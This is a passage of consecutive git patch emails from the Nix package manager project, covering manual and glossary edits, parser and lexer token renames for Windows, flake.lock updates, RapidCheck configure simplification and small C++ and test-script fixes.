+ To build a release version of Nix for the current operating system and CPU architecture: ```console diff --git a/doc/manual/src/contributing/testing.md b/doc/manual/src/contributing/testing.md index d8d162379..31c39c16c 100644 --- a/doc/manual/src/contributing/testing.md +++ b/doc/manual/src/contributing/testing.md @@ -77,7 +77,7 @@ there is no risk of any build-system wildcards for the library accidentally pick ### Running tests You can run the whole testsuite with `make check`, or the tests for a specific component with `make libfoo-tests_RUN`. -Finer-grained filtering is also possible using the [--gtest_filter](https://google.github.io/googletest/advanced.html#running-a-subset-of-the-tests) command-line option, or the `GTEST_FILTER` environment variable. +Finer-grained filtering is also possible using the [--gtest_filter](https://google.github.io/googletest/advanced.html#running-a-subset-of-the-tests) command-line option, or the `GTEST_FILTER` environment variable, e.g. `GTEST_FILTER='ErrorTraceTest.*' make check`. ### Characterisation testing { #characaterisation-testing-unit } From 2d96c7a51f04755dc22856be012bd73dec13ad13 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Fri, 12 Jan 2024 11:27:31 -0800 Subject: [PATCH 248/654] Remove outdated reference to `y` in `nix-instantiate` man page --- doc/manual/src/command-ref/nix-instantiate.md | 5 ----- 1 file changed, 5 deletions(-) diff --git a/doc/manual/src/command-ref/nix-instantiate.md b/doc/manual/src/command-ref/nix-instantiate.md index 483150aa8..89e106bb0 100644 --- a/doc/manual/src/command-ref/nix-instantiate.md +++ b/doc/manual/src/command-ref/nix-instantiate.md @@ -179,12 +179,7 @@ $ nix-instantiate --eval --xml --expr '{ x = {}; }' -``` -Note that `y` is left unevaluated (the XML representation doesn’t -attempt to show non-normal forms). 
- -```console $ nix-instantiate --eval --xml --strict --expr '{ x = {}; }' From f73e50144f21adc9a6344bc4a5f8ded757d781fd Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Fri, 12 Jan 2024 11:31:49 -0800 Subject: [PATCH 249/654] Clarify ambiguity in `nix-instantiate` man page --- doc/manual/src/command-ref/nix-instantiate.md | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/doc/manual/src/command-ref/nix-instantiate.md b/doc/manual/src/command-ref/nix-instantiate.md index 89e106bb0..479c9abcf 100644 --- a/doc/manual/src/command-ref/nix-instantiate.md +++ b/doc/manual/src/command-ref/nix-instantiate.md @@ -44,9 +44,10 @@ standard input. > **Warning** > - > This option produces ambiguous output which is not suitable for machine - > consumption. For example, these two Nix expressions print the same result - > despite having different types: + > This option produces output which can be parsed as a Nix expression which + > will produce a different result than the input expression when evaluated. + > For example, these two Nix expressions print the same result despite + > having different meaning: > > ```console > $ nix-instantiate --eval --expr '{ a = {}; }' From 15f7bdaf276252f7b536c189b9b3eef73ad0e6e7 Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Fri, 12 Jan 2024 22:55:37 +0100 Subject: [PATCH 250/654] CanonPath: Add rel_c_str() Defensively because isRoot() is also defensive. 
--- src/libfetchers/git-utils.cc | 3 +-- src/libutil/canon-path.hh | 7 +++++++ 2 files changed, 8 insertions(+), 2 deletions(-) diff --git a/src/libfetchers/git-utils.cc b/src/libfetchers/git-utils.cc index bfc7059fe..6726407b5 100644 --- a/src/libfetchers/git-utils.cc +++ b/src/libfetchers/git-utils.cc @@ -674,8 +674,7 @@ struct GitExportIgnoreInputAccessor : CachingFilteringInputAccessor { bool gitAttrGet(const CanonPath & path, const char * attrName, const char * & valueOut) { - std::string pathStr {path.rel()}; - const char * pathCStr = pathStr.c_str(); + const char * pathCStr = path.rel_c_str(); if (rev) { git_attr_options opts = GIT_ATTR_OPTIONS_INIT; diff --git a/src/libutil/canon-path.hh b/src/libutil/canon-path.hh index 6aff4ec0d..997c8c731 100644 --- a/src/libutil/canon-path.hh +++ b/src/libutil/canon-path.hh @@ -88,6 +88,13 @@ public: std::string_view rel() const { return ((std::string_view) path).substr(1); } + const char * rel_c_str() const + { + auto cs = path.c_str(); + assert(cs[0]); // for safety if invariant is broken + return &cs[1]; + } + struct Iterator { std::string_view remaining; From dd7e7b0a30a0564741c40e70f33cbf1cd6130106 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Thu, 11 Jan 2024 11:26:03 -0500 Subject: [PATCH 251/654] Newer Nixpkgs, get `readline` on Windows MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Now `nix repl` an, in principle, work on that platform too. 
Flake lock file updates: • Updated input 'nixpkgs': 'github:NixOS/nixpkgs/2c9c58e98243930f8cb70387934daa4bc8b00373' (2023-12-31) → 'github:NixOS/nixpkgs/86501af7f1d51915e6c335f90f2cab73d7704ef3' (2024-01-11) --- flake.lock | 6 +++--- package.nix | 1 - 2 files changed, 3 insertions(+), 4 deletions(-) diff --git a/flake.lock b/flake.lock index ae98d789a..65e468e8b 100644 --- a/flake.lock +++ b/flake.lock @@ -34,11 +34,11 @@ }, "nixpkgs": { "locked": { - "lastModified": 1704018918, - "narHash": "sha256-erjg/HrpC9liEfm7oLqb8GXCqsxaFwIIPqCsknW5aFY=", + "lastModified": 1704982786, + "narHash": "sha256-w62+4HyaHafLWjvrC2Eto7bSnSJQtia8oqs3//mkpCU=", "owner": "NixOS", "repo": "nixpkgs", - "rev": "2c9c58e98243930f8cb70387934daa4bc8b00373", + "rev": "86501af7f1d51915e6c335f90f2cab73d7704ef3", "type": "github" }, "original": { diff --git a/package.nix b/package.nix index 37410dc2f..a632fd6ec 100644 --- a/package.nix +++ b/package.nix @@ -236,7 +236,6 @@ in { openssl sqlite xz - ] ++ lib.optionals (!stdenv.hostPlatform.isWindows) [ ({ inherit readline editline; }.${readlineFlavor}) ] ++ lib.optionals enableMarkdown [ lowdown From e739a5002dab199a6cf207e6e62b394fa77f8cb2 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Fri, 12 Jan 2024 19:46:48 -0500 Subject: [PATCH 252/654] Avoid Windows macros in the parser and lexer `FLOAT`, `INT`, and `IN` are identifers taken by macros. The name `IN_KW` is chosen to match `OR_KW`, which is presumably named that way for the same reason of dodging macros. 
--- src/libexpr/lexer.l | 6 +++--- src/libexpr/parser.y | 12 ++++++------ 2 files changed, 9 insertions(+), 9 deletions(-) diff --git a/src/libexpr/lexer.l b/src/libexpr/lexer.l index df2cbd06f..9addb3ae8 100644 --- a/src/libexpr/lexer.l +++ b/src/libexpr/lexer.l @@ -130,7 +130,7 @@ else { return ELSE; } assert { return ASSERT; } with { return WITH; } let { return LET; } -in { return IN; } +in { return IN_KW; } rec { return REC; } inherit { return INHERIT; } or { return OR_KW; } @@ -156,7 +156,7 @@ or { return OR_KW; } .errPos = data->state.positions[CUR_POS], }); } - return INT; + return INT_LIT; } {FLOAT} { errno = 0; yylval->nf = strtod(yytext, 0); @@ -165,7 +165,7 @@ or { return OR_KW; } .msg = hintfmt("invalid float '%1%'", yytext), .errPos = data->state.positions[CUR_POS], }); - return FLOAT; + return FLOAT_LIT; } \$\{ { PUSH_STATE(DEFAULT); return DOLLAR_CURLY; } diff --git a/src/libexpr/parser.y b/src/libexpr/parser.y index b331776f0..60bcfebf9 100644 --- a/src/libexpr/parser.y +++ b/src/libexpr/parser.y @@ -365,11 +365,11 @@ void yyerror(YYLTYPE * loc, yyscan_t scanner, ParseData * data, const char * err %type attr %token ID %token STR IND_STR -%token INT -%token FLOAT +%token INT_LIT +%token FLOAT_LIT %token PATH HPATH SPATH PATH_END %token URI -%token IF THEN ELSE ASSERT WITH LET IN REC INHERIT EQ NEQ AND OR IMPL OR_KW +%token IF THEN ELSE ASSERT WITH LET IN_KW REC INHERIT EQ NEQ AND OR IMPL OR_KW %token DOLLAR_CURLY /* == ${ */ %token IND_STRING_OPEN IND_STRING_CLOSE %token ELLIPSIS @@ -412,7 +412,7 @@ expr_function { $$ = new ExprAssert(CUR_POS, $2, $4); } | WITH expr ';' expr_function { $$ = new ExprWith(CUR_POS, $2, $4); } - | LET binds IN expr_function + | LET binds IN_KW expr_function { if (!$2->dynamicAttrs.empty()) throw ParseError({ .msg = hintfmt("dynamic attributes not allowed in let"), @@ -482,8 +482,8 @@ expr_simple else $$ = new ExprVar(CUR_POS, data->symbols.create($1)); } - | INT { $$ = new ExprInt($1); } - | FLOAT { $$ = new 
ExprFloat($1); } + | INT_LIT { $$ = new ExprInt($1); } + | FLOAT_LIT { $$ = new ExprFloat($1); } | '"' string_parts '"' { $$ = $2; } | IND_STRING_OPEN ind_string_parts IND_STRING_CLOSE { $$ = stripIndentation(CUR_POS, data->symbols, std::move(*$2)); From cbd5553d57ebf5d0532047165a2d81825424bd76 Mon Sep 17 00:00:00 2001 From: Qyriad Date: Sat, 13 Jan 2024 04:20:08 -0700 Subject: [PATCH 253/654] doc: provide context in glossary definitions (#9378) --- doc/manual/src/glossary.md | 21 +++++++++++++-------- 1 file changed, 13 insertions(+), 8 deletions(-) diff --git a/doc/manual/src/glossary.md b/doc/manual/src/glossary.md index 07891175a..1fdb8b4dd 100644 --- a/doc/manual/src/glossary.md +++ b/doc/manual/src/glossary.md @@ -3,10 +3,10 @@ - [derivation]{#gloss-derivation} A description of a build task. The result of a derivation is a - store object. Derivations are typically specified in Nix expressions + store object. Derivations declared in Nix expressions are specified using the [`derivation` primitive](./language/derivations.md). These are translated into low-level *store derivations* (implicitly by - `nix-env` and `nix-build`, or explicitly by `nix-instantiate`). + `nix-build`, or explicitly by `nix-instantiate`). [derivation]: #gloss-derivation @@ -14,6 +14,7 @@ A [derivation] represented as a `.drv` file in the [store]. It has a [store path], like any [store object]. + It is the [instantiated][instantiate] form of a derivation. Example: `/nix/store/g946hcz4c8mdvq2g8vxx42z51qb71rvp-git-2.38.1.drv` @@ -23,9 +24,9 @@ - [instantiate]{#gloss-instantiate}, instantiation - Translate a [derivation] into a [store derivation]. + Save an evaluated [derivation] as a [store derivation] in the Nix [store]. - See [`nix-instantiate`](./command-ref/nix-instantiate.md). + See [`nix-instantiate`](./command-ref/nix-instantiate.md), which produces a store derivation from a Nix expression that evaluates to a derivation. 
[instantiate]: #gloss-instantiate @@ -66,7 +67,7 @@ From the perspective of the location where Nix is invoked, the Nix store can be referred to _local_ or _remote_. Only a [local store]{#gloss-local-store} exposes a location in the file system of the machine where Nix is invoked that allows access to store objects, typically `/nix/store`. - Local stores can be used for building [derivations](#derivation). + Local stores can be used for building [derivations](#gloss-derivation). See [Local Store](@docroot@/command-ref/new-cli/nix3-help-stores.md#local-store) for details. [store]: #gloss-store @@ -168,9 +169,10 @@ A high-level description of software packages and compositions thereof. Deploying software using Nix entails writing Nix - expressions for your packages. Nix expressions are translated to - derivations that are stored in the Nix store. These derivations can - then be built. + expressions for your packages. Nix expressions specify [derivations][derivation], + which are [instantiated][instantiate] into the Nix store as [store derivations][store derivation]. + These derivations can then be [realised][realise] to produce + [outputs][output]. - [reference]{#gloss-reference} @@ -222,6 +224,9 @@ The [store derivation] that produced an [output path]. + The deriver for an output path can be queried with the `--deriver` option to + [`nix-store --query`](@docroot@/command-ref/nix-store/query.md). + - [validity]{#gloss-validity} A store path is valid if all [store object]s in its [closure] can be read from the [store]. 
From e838ac98d4fc54774bcaaa30a72cd9d3da01befc Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Sat, 13 Jan 2024 19:41:27 +0100 Subject: [PATCH 254/654] doc/glossary: Nix expression can be language expression --- doc/manual/src/glossary.md | 16 ++++++++++------ 1 file changed, 10 insertions(+), 6 deletions(-) diff --git a/doc/manual/src/glossary.md b/doc/manual/src/glossary.md index 1fdb8b4dd..870b2c3c6 100644 --- a/doc/manual/src/glossary.md +++ b/doc/manual/src/glossary.md @@ -167,12 +167,13 @@ - [Nix expression]{#gloss-nix-expression} - A high-level description of software packages and compositions - thereof. Deploying software using Nix entails writing Nix - expressions for your packages. Nix expressions specify [derivations][derivation], - which are [instantiated][instantiate] into the Nix store as [store derivations][store derivation]. - These derivations can then be [realised][realise] to produce - [outputs][output]. + 1. Commonly, a high-level description of software packages and compositions + thereof. Deploying software using Nix entails writing Nix + expressions for your packages. Nix expressions specify [derivations][derivation], + which are [instantiated][instantiate] into the Nix store as [store derivations][store derivation]. + These derivations can then be [realised][realise] to produce [outputs][output]. + + 2. A syntactically valid use of the [Nix language]. For example, the contents of a `.nix` file form an expression. - [reference]{#gloss-reference} @@ -287,3 +288,6 @@ These flags are enabled or disabled with the [`experimental-features`](./command-ref/conf-file.html#conf-experimental-features) setting. See the contribution guide on the [purpose and lifecycle of experimental feaures](@docroot@/contributing/experimental-features.md). 
+ + +[Nix language]: ./language/index.md \ No newline at end of file From 7e5fa5c25ce585da5399038bc92980fddbb65d8b Mon Sep 17 00:00:00 2001 From: Robert Hensing Date: Sat, 13 Jan 2024 20:00:06 +0100 Subject: [PATCH 255/654] doc/glossary: Define package and package attribute set A small step towards https://github.com/NixOS/nix/issues/6507 I believe this incomplete definition is one that can be agreed on. It would be nice to define more, but considering that the issue also proposes changes to the design, I believe we should hold off on those. As for the wording, we're dealing with some very general and vague terms, that have to be treated with exactly the right amount of vagueness to be effective. I start out with a fairly abstract definition of package. 1. to establish a baseline so we know what we're talking about 2. so that we can go in and clarify that we have an extra, Nix-specific definition. "Software" is notoriously ill-defined, so it makes a great qualifier for package, which we don't really want to pin down either, because that would just get us lost in discussion. We can come back to this after we've done 6057 and a few years in a desert cave. Then comes the "package attribute set" definition. I can already hear Valentin say "That's not even Nix's responsibility!" and on some days I might even agree. However, in our current reality, we have `nix-env`, `nix-build` and `nix profile`, which query the `outputName` attribute - among others - which just don't exist in the derivation. For those who can't believe what they're reading: $ nix-build --expr 'with import ./. {}; bind // {outputName = "lib";}' --no-out-link this path will be fetched (1.16 MiB download, 3.72 MiB unpacked): /nix/store/rfk6klfx3z972gavxlw6iypnj6j806ma-bind-9.18.21-lib copying path '/nix/store/rfk6klfx3z972gavxlw6iypnj6j806ma-bind-9.18.21-lib' from 'https://cache.nixos.org'... /nix/store/rfk6klfx3z972gavxlw6iypnj6j806ma-bind-9.18.21-lib and let me tell you that bind is not a library. 
So anyway, that's also proof of why calling this a "derivation attrset" would be wrong, despite the type attribute. --- doc/manual/src/glossary.md | 15 +++++++++++++++ 1 file changed, 15 insertions(+) diff --git a/doc/manual/src/glossary.md b/doc/manual/src/glossary.md index 1fdb8b4dd..5e3c0e024 100644 --- a/doc/manual/src/glossary.md +++ b/doc/manual/src/glossary.md @@ -271,6 +271,21 @@ The epsilon symbol. In the context of a package, this means the version is empty. More precisely, the derivation does not have a version attribute. +- [package]{#package} + + 1. A software package; typically a collection of programs, files and data. + + 2. A [package attribute set]. + +- [package attribute set]{#package-attribute-set} + + An [attribute set] containing the attribute `type = "derivation";` (derivation for historical reasons), as well as other attributes, such as + - attributes that refer to the files of a [package], typically in the form of [derivation outputs](#output), + - attributes that declare something about how the package is supposed to be installed or used, + - other metadata or arbitrary attributes. + + [package attribute set]: #package-attribute-set + - [string interpolation]{#gloss-string-interpolation} Expanding expressions enclosed in `${ }` within a [string], [path], or [attribute name]. From bbcd9fcfc1216bd7d88fef7933766e616c7111d0 Mon Sep 17 00:00:00 2001 From: Cole Helbling Date: Sat, 13 Jan 2024 11:27:04 -0800 Subject: [PATCH 256/654] Arbitrarily bring back some nix-daemon calls This means that both `nix daemon` and `nix-daemon` will be (somewhat) tested. 
--- tests/functional/build-remote-trustless-should-pass-1.sh | 2 +- tests/functional/nix-daemon-untrusting.sh | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/tests/functional/build-remote-trustless-should-pass-1.sh b/tests/functional/build-remote-trustless-should-pass-1.sh index 736e280e4..516bdf092 100644 --- a/tests/functional/build-remote-trustless-should-pass-1.sh +++ b/tests/functional/build-remote-trustless-should-pass-1.sh @@ -2,7 +2,7 @@ source common.sh # Remote trusts us file=build-hook.nix -prog='nix%20daemon' +prog=nix-daemon proto=ssh-ng source build-remote-trustless.sh diff --git a/tests/functional/nix-daemon-untrusting.sh b/tests/functional/nix-daemon-untrusting.sh index c339b5833..bcdb70989 100755 --- a/tests/functional/nix-daemon-untrusting.sh +++ b/tests/functional/nix-daemon-untrusting.sh @@ -1,3 +1,3 @@ #!/bin/sh -exec nix daemon --force-untrusted "$@" +exec nix-daemon --force-untrusted "$@" From f61d951909a619b7a430d8d8aa739e310c7bf472 Mon Sep 17 00:00:00 2001 From: Las Safin Date: Sat, 13 Jan 2024 19:27:20 +0000 Subject: [PATCH 257/654] Avoid unnecessary copy of goal log The data was (accidentally?) copied into a std::string, even though the string is immediately converted into a std::string_view. The code has been changed to construct a std::string_view directly, such that one copy less happens. 
--- src/libstore/build/worker.cc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/libstore/build/worker.cc b/src/libstore/build/worker.cc index 399ad47fd..974a9f510 100644 --- a/src/libstore/build/worker.cc +++ b/src/libstore/build/worker.cc @@ -449,7 +449,7 @@ void Worker::waitForInput() } else { printMsg(lvlVomit, "%1%: read %2% bytes", goal->getName(), rd); - std::string data((char *) buffer.data(), rd); + std::string_view data((char *) buffer.data(), rd); j->lastOutput = after; goal->handleChildOutput(k, data); } From 03a6ca9b253c35b33e041dce595239968224e0d3 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sun, 14 Jan 2024 15:25:24 -0500 Subject: [PATCH 258/654] `tests/functional/nix-profile.sh`: Add missing `--no-link` Otherwise we get a stray `tests/functional/result`, which can cause spurious failures later. (I got a failure because the test temp dir effecting the store dir changed. This caused a test later because Nix didn't want to remove the old `result` because it wasn't pointing inside the new Nix store.) 
--- tests/functional/nix-profile.sh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tests/functional/nix-profile.sh b/tests/functional/nix-profile.sh index 6f304bd9a..35a62fbe2 100644 --- a/tests/functional/nix-profile.sh +++ b/tests/functional/nix-profile.sh @@ -199,6 +199,6 @@ clearProfiles mkdir -p $TEST_ROOT/import-profile outPath=$(nix build --no-link --print-out-paths $flake1Dir/flake.nix^out) printf '{ "version": 2, "elements": [ { "active": true, "attrPath": "legacyPackages.x86_64-linux.hello", "originalUrl": "flake:nixpkgs", "outputs": null, "priority": 5, "storePaths": [ "%s" ], "url": "github:NixOS/nixpkgs/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" } ] }' "$outPath" > $TEST_ROOT/import-profile/manifest.json -nix build --profile $TEST_HOME/.nix-profile $(nix store add-path $TEST_ROOT/import-profile) +nix build --profile $TEST_HOME/.nix-profile $(nix store add-path $TEST_ROOT/import-profile) --no-link nix profile list | grep -A4 'Name:.*hello' | grep "Store paths:.*$outPath" nix profile remove hello 2>&1 | grep 'removed 1 packages, kept 0 packages' From dd42a4e3e9ec6d76d393e24f449f161b62579dc5 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Mon, 15 Jan 2024 08:04:46 -0500 Subject: [PATCH 259/654] flake.lock: Update MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Flake lock file updates: • Updated input 'nixpkgs': 'github:NixOS/nixpkgs/86501af7f1d51915e6c335f90f2cab73d7704ef3' (2024-01-11) → 'github:NixOS/nixpkgs/a1982c92d8980a0114372973cbdfe0a307f1bdea' (2024-01-12) --- flake.lock | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/flake.lock b/flake.lock index 65e468e8b..f0efb4036 100644 --- a/flake.lock +++ b/flake.lock @@ -34,11 +34,11 @@ }, "nixpkgs": { "locked": { - "lastModified": 1704982786, - "narHash": "sha256-w62+4HyaHafLWjvrC2Eto7bSnSJQtia8oqs3//mkpCU=", + "lastModified": 1705033721, + "narHash": "sha256-K5eJHmL1/kev6WuqyqqbS1cdNnSidIZ3jeqJ7GbrYnQ=", "owner": 
"NixOS", "repo": "nixpkgs", - "rev": "86501af7f1d51915e6c335f90f2cab73d7704ef3", + "rev": "a1982c92d8980a0114372973cbdfe0a307f1bdea", "type": "github" }, "original": { From 9b9ecdee3424056cb854bc8f1aa49fe330c08c83 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Thu, 11 Jan 2024 23:50:03 -0500 Subject: [PATCH 260/654] Simplify RapidCheck configure No more `RAPIDCHECK_HEADERS`! --- Makefile.config.in | 1 - configure.ac | 21 +-------------------- doc/internal-api/doxygen.cfg.in | 2 +- package.nix | 2 +- 4 files changed, 3 insertions(+), 23 deletions(-) diff --git a/Makefile.config.in b/Makefile.config.in index 21a9f41ec..d5c382630 100644 --- a/Makefile.config.in +++ b/Makefile.config.in @@ -29,7 +29,6 @@ LOWDOWN_LIBS = @LOWDOWN_LIBS@ OPENSSL_LIBS = @OPENSSL_LIBS@ PACKAGE_NAME = @PACKAGE_NAME@ PACKAGE_VERSION = @PACKAGE_VERSION@ -RAPIDCHECK_HEADERS = @RAPIDCHECK_HEADERS@ SHELL = @bash@ SODIUM_LIBS = @SODIUM_LIBS@ SQLITE3_LIBS = @SQLITE3_LIBS@ diff --git a/configure.ac b/configure.ac index 2594544ab..f46cff732 100644 --- a/configure.ac +++ b/configure.ac @@ -353,27 +353,8 @@ AS_IF([test "$ENABLE_UNIT_TESTS" == "yes"],[ # Look for gtest. PKG_CHECK_MODULES([GTEST], [gtest_main]) - # Look for rapidcheck. 
-AC_ARG_VAR([RAPIDCHECK_HEADERS], [include path of gtest headers shipped by RAPIDCHECK]) -# No pkg-config yet, https://github.com/emil-e/rapidcheck/issues/302 -AC_LANG_PUSH(C++) -AC_SUBST(RAPIDCHECK_HEADERS) -[CXXFLAGS="-I $RAPIDCHECK_HEADERS $CXXFLAGS"] -[LIBS="-lrapidcheck -lgtest $LIBS"] -AC_CHECK_HEADERS([rapidcheck/gtest.h], [], [], [#include ]) -dnl AC_CHECK_LIB doesn't work for C++ libs with mangled symbols -AC_LINK_IFELSE([ - AC_LANG_PROGRAM([[ - #include - #include - ]], [[ - return RUN_ALL_TESTS(); - ]]) - ], - [], - [AC_MSG_ERROR([librapidcheck is not found.])]) -AC_LANG_POP(C++) +PKG_CHECK_MODULES([RAPIDCHECK], [rapidcheck rapidcheck_gtest]) ]) diff --git a/doc/internal-api/doxygen.cfg.in b/doc/internal-api/doxygen.cfg.in index ad5af97e6..6c6c325bd 100644 --- a/doc/internal-api/doxygen.cfg.in +++ b/doc/internal-api/doxygen.cfg.in @@ -81,7 +81,7 @@ EXPAND_ONLY_PREDEF = YES # RECURSIVE has no effect here. # This tag requires that the tag SEARCH_INCLUDES is set to YES. -INCLUDE_PATH = @RAPIDCHECK_HEADERS@ +INCLUDE_PATH = # If the MACRO_EXPANSION and EXPAND_ONLY_PREDEF tags are set to YES then this # tag can be used to specify a list of macro names that should be expanded. The diff --git a/package.nix b/package.nix index a632fd6ec..a1188ba9c 100644 --- a/package.nix +++ b/package.nix @@ -309,7 +309,7 @@ in { ] ++ lib.optional (doBuild && stdenv.isLinux && !(stdenv.hostPlatform.isStatic && stdenv.system == "aarch64-linux")) "LDFLAGS=-fuse-ld=gold" ++ lib.optional (doBuild && stdenv.hostPlatform.isStatic) "--enable-embedded-sandbox-shell" - ++ lib.optional buildUnitTests "RAPIDCHECK_HEADERS=${lib.getDev rapidcheck}/extras/gtest/include"; + ; enableParallelBuilding = true; From beed00c04e136e8d685905e4b2b1116ecdf42f63 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Sat, 13 Jan 2024 13:08:38 -0500 Subject: [PATCH 261/654] `absPath`: just take a `std::string_view` 1. Slightly more efficient 2. 
Easier to call Co-authored-by: Cole Helbling --- src/libutil/canon-path.cc | 6 +++--- src/libutil/file-system.cc | 14 +++++++++++--- src/libutil/file-system.hh | 2 +- 3 files changed, 15 insertions(+), 7 deletions(-) diff --git a/src/libutil/canon-path.cc b/src/libutil/canon-path.cc index 1e465f1f6..0a0f96a05 100644 --- a/src/libutil/canon-path.cc +++ b/src/libutil/canon-path.cc @@ -6,11 +6,11 @@ namespace nix { CanonPath CanonPath::root = CanonPath("/"); CanonPath::CanonPath(std::string_view raw) - : path(absPath((Path) raw, "/")) + : path(absPath(raw, "/")) { } CanonPath::CanonPath(std::string_view raw, const CanonPath & root) - : path(absPath((Path) raw, root.abs())) + : path(absPath(raw, root.abs())) { } CanonPath::CanonPath(const std::vector & elems) @@ -22,7 +22,7 @@ CanonPath::CanonPath(const std::vector & elems) CanonPath CanonPath::fromCwd(std::string_view path) { - return CanonPath(unchecked_t(), absPath((Path) path)); + return CanonPath(unchecked_t(), absPath(path)); } std::optional CanonPath::parent() const diff --git a/src/libutil/file-system.cc b/src/libutil/file-system.cc index 4cac35ace..ab8d32275 100644 --- a/src/libutil/file-system.cc +++ b/src/libutil/file-system.cc @@ -21,9 +21,16 @@ namespace fs = std::filesystem; namespace nix { -Path absPath(Path path, std::optional dir, bool resolveSymlinks) +Path absPath(PathView path, std::optional dir, bool resolveSymlinks) { + std::string scratch; + if (path[0] != '/') { + // In this case we need to call `canonPath` on a newly-created + // string. We set `scratch` to that string first, and then set + // `path` to `scratch`. This ensures the newly-created string + // lives long enough for the call to `canonPath`, and allows us + // to just accept a `std::string_view`. if (!dir) { #ifdef __GNU__ /* GNU (aka. 
GNU/Hurd) doesn't have any limitation on path @@ -35,12 +42,13 @@ Path absPath(Path path, std::optional dir, bool resolveSymlinks) if (!getcwd(buf, sizeof(buf))) #endif throw SysError("cannot get cwd"); - path = concatStrings(buf, "/", path); + scratch = concatStrings(buf, "/", path); #ifdef __GNU__ free(buf); #endif } else - path = concatStrings(*dir, "/", path); + scratch = concatStrings(*dir, "/", path); + path = scratch; } return canonPath(path, resolveSymlinks); } diff --git a/src/libutil/file-system.hh b/src/libutil/file-system.hh index 4637507b3..464efc242 100644 --- a/src/libutil/file-system.hh +++ b/src/libutil/file-system.hh @@ -41,7 +41,7 @@ struct Source; * specified directory, or the current directory otherwise. The path * is also canonicalised. */ -Path absPath(Path path, +Path absPath(PathView path, std::optional dir = {}, bool resolveSymlinks = false); From f07388bf985c2440413f398cf93d5f5840d1ec8c Mon Sep 17 00:00:00 2001 From: pennae Date: Mon, 15 Jan 2024 16:52:18 +0100 Subject: [PATCH 262/654] remove ParserFormals this is a proper subset of Formals anyway, so let's just use those and avoid the extra allocations and moves. 
--- src/libexpr/parser.y | 30 ++++++++++-------------------- 1 file changed, 10 insertions(+), 20 deletions(-) diff --git a/src/libexpr/parser.y b/src/libexpr/parser.y index 60bcfebf9..b7b25854b 100644 --- a/src/libexpr/parser.y +++ b/src/libexpr/parser.y @@ -63,11 +63,6 @@ namespace nix { std::optional error; }; - struct ParserFormals { - std::vector formals; - bool ellipsis = false; - }; - } // using C a struct allows us to avoid having to define the special @@ -179,7 +174,7 @@ static void addAttr(ExprAttrs * attrs, AttrPath && attrPath, } -static Formals * toFormals(ParseData & data, ParserFormals * formals, +static Formals * validateFormals(ParseData & data, Formals * formals, PosIdx pos = noPos, Symbol arg = {}) { std::sort(formals->formals.begin(), formals->formals.end(), @@ -200,18 +195,13 @@ static Formals * toFormals(ParseData & data, ParserFormals * formals, .errPos = data.state.positions[duplicate->second] }); - Formals result; - result.ellipsis = formals->ellipsis; - result.formals = std::move(formals->formals); - - if (arg && result.has(arg)) + if (arg && formals->has(arg)) throw ParseError({ .msg = hintfmt("duplicate formal function argument '%1%'", data.symbols[arg]), .errPos = data.state.positions[pos] }); - delete formals; - return new Formals(std::move(result)); + return formals; } @@ -339,7 +329,7 @@ void yyerror(YYLTYPE * loc, yyscan_t scanner, ParseData * data, const char * err nix::Expr * e; nix::ExprList * list; nix::ExprAttrs * attrs; - nix::ParserFormals * formals; + nix::Formals * formals; nix::Formal * formal; nix::NixInt n; nix::NixFloat nf; @@ -397,16 +387,16 @@ expr_function : ID ':' expr_function { $$ = new ExprLambda(CUR_POS, data->symbols.create($1), 0, $3); } | '{' formals '}' ':' expr_function - { $$ = new ExprLambda(CUR_POS, toFormals(*data, $2), $5); } + { $$ = new ExprLambda(CUR_POS, validateFormals(*data, $2), $5); } | '{' formals '}' '@' ID ':' expr_function { auto arg = data->symbols.create($5); - $$ = new 
ExprLambda(CUR_POS, arg, toFormals(*data, $2, CUR_POS, arg), $7); + $$ = new ExprLambda(CUR_POS, arg, validateFormals(*data, $2, CUR_POS, arg), $7); } | ID '@' '{' formals '}' ':' expr_function { auto arg = data->symbols.create($1); - $$ = new ExprLambda(CUR_POS, arg, toFormals(*data, $4, CUR_POS, arg), $7); + $$ = new ExprLambda(CUR_POS, arg, validateFormals(*data, $4, CUR_POS, arg), $7); } | ASSERT expr ';' expr_function { $$ = new ExprAssert(CUR_POS, $2, $4); } @@ -650,11 +640,11 @@ formals : formal ',' formals { $$ = $3; $$->formals.emplace_back(*$1); delete $1; } | formal - { $$ = new ParserFormals; $$->formals.emplace_back(*$1); $$->ellipsis = false; delete $1; } + { $$ = new Formals; $$->formals.emplace_back(*$1); $$->ellipsis = false; delete $1; } | - { $$ = new ParserFormals; $$->ellipsis = false; } + { $$ = new Formals; $$->ellipsis = false; } | ELLIPSIS - { $$ = new ParserFormals; $$->ellipsis = true; } + { $$ = new Formals; $$->ellipsis = true; } ; formal From e8d9de967fe47a7f9324b0022a2ef50df59f419d Mon Sep 17 00:00:00 2001 From: pennae Date: Mon, 15 Jan 2024 16:52:18 +0100 Subject: [PATCH 263/654] simplify parse error reporting since nix doesn't use the bison `error` terminal anywhere any invocation of yyerror will immediately cause a failure. since we're *already* leaking tons of memory whatever little bit bison allocates internally doesn't much matter any more, and we'll be replacing the parser soon anyway. coincidentally this now also matches the error behavior of URIs when they are disabled or ~/ paths in pure eval mode, duplicate attr detection etc. 
